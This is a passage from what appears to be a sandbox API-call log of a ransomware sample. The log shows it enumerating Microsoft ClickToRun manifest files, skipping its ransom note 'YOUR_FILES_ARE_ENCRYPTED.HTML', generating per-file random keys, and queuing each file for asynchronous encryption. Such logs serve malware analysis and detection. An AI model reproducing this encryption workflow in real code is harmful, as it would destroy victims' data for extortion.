lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" [0156.456] 
CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.456] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.456] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77fe2dd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Proof.Culture.msi.16.es-es.xml", cAlternateFileName="C23127~1.XML")) returned 1 [0156.456] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml") returned 121 [0156.456] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.456] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml") returned=".xml" [0156.456] lstrlenW (lpString=".xml") returned 4 [0156.456] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml") returned=".xml" [0156.456] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0156.457] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=24486) returned 1 [0156.457] GetProcessHeap () returned 0x270000 [0156.458] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.462] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="53") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="CD") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="91") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="DA") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="EE") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D7") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="7D") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="0C") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="28") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DD") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BD") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="58") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="BE") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="6C") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1D") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="88") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E9") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="C3") returned 
2 [0156.463] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="CB") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AA") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="F4") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E1") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2C") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="7A") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A1") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A1") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="96") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A8") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D5") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B6") returned 2 [0156.464] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="CF") returned 2 [0156.464] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="76") returned 2 [0156.464] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" [0156.464] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.464] PostQueuedCompletionStatus (CompletionPort=0x3a0, 
dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.464] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77f709b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cAlternateFileName="C2BAB3~1.XML")) returned 1 [0156.464] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned 121 [0156.464] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.465] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned=".xml" [0156.465] lstrlenW (lpString=".xml") returned 4 [0156.465] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned=".xml" [0156.465] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0156.465] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=24486) returned 
1 [0156.465] GetProcessHeap () returned 0x270000 [0156.465] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0156.467] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CF") returned 2 [0156.467] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="B4") returned 2 [0156.467] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B3") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B1") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="4D") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="CD") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="9A") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C2") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D0") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="31") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BB") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="88") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="12") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="9D") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="21") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="4A") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="1C") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="78") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="68") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="1E") returned 2 [0156.468] 
wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="56") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="02") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8B") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5E") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F9") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="8C") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3A") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="12") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B2") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="9E") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="1C") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1A") returned 2 [0156.469] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" [0156.469] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.469] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0156.469] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77f96b10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.proofing.msi.16.en-us.xml", cAlternateFileName="C24618~1.XML")) returned 1 [0156.469] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml") returned 116 [0156.469] lstrcmpW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.469] PathFindExtensionW (pszPath="C2RManifest.proofing.msi.16.en-us.xml") returned=".xml" [0156.469] lstrlenW (lpString=".xml") returned 4 [0156.469] PathFindExtensionW (pszPath="C2RManifest.proofing.msi.16.en-us.xml") returned=".xml" [0156.469] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.470] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=2042) returned 1 [0156.470] GetProcessHeap () returned 0x270000 [0156.470] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0156.472] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: 
param_1="CF") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="76") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E5") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="2C") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="0D") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="B3") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="C9") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="8B") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8E") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B1") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6C") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="B2") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="6C") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="7D") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="BF") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="88") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E0") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="2A") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5E") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="10") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="57") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="C1") returned 2 [0156.473] wsprintfW (in: 
param_1=0x4ebda8e, param_2="%02X" | out: param_1="C3") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="BB") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="2E") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="40") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="24") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="FE") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="13") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C5") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="F1") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="5B") returned 2 [0156.474] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" [0156.474] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.474] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0156.474] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, 
ftLastWriteTime.dwLowDateTime=0x77611310, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x12d6e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cAlternateFileName="C2C6D1~1.XML")) returned 1 [0156.474] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned 135 [0156.474] lstrcmpW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.474] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned=".xml" [0156.474] lstrlenW (lpString=".xml") returned 4 [0156.474] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned=".xml" [0156.474] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.474] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.475] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=77166) returned 1 [0156.475] GetProcessHeap () returned 0x270000 [0156.475] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74ea160 [0156.479] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="6F") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | 
out: param_1="2A") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D0") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="93") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="15") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="96") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="99") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="B0") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="06") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="87") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="72") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CA") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="A7") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4F") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C6") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="76") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="29") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="DD") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9A") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="DD") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="72") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B3") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="84") returned 2 [0156.479] wsprintfW (in: 
param_1=0x4ebda92, param_2="%02X" | out: param_1="22") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="75") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F1") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C7") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C2") returned 2 [0156.480] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="27") returned 2 [0156.480] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="BF") returned 2 [0156.480] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="85") returned 2 [0156.480] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="56") returned 2 [0156.534] lstrcpyW (in: lpString1=0x74fa214, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" [0156.534] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74ea160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.534] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74ea160, lpOverlapped=0x74ea160) returned 1 [0156.535] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92cf2b50, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92cf2b50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77efe590, 
ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3708, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.publishermui.msi.16.en-us.xml", cAlternateFileName="C2RMAN~4.XML")) returned 1 [0156.535] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml") returned 120 [0156.535] lstrcmpW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.535] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml") returned=".xml" [0156.535] lstrlenW (lpString=".xml") returned 4 [0156.535] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml") returned=".xml" [0156.535] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.536] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.549] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | 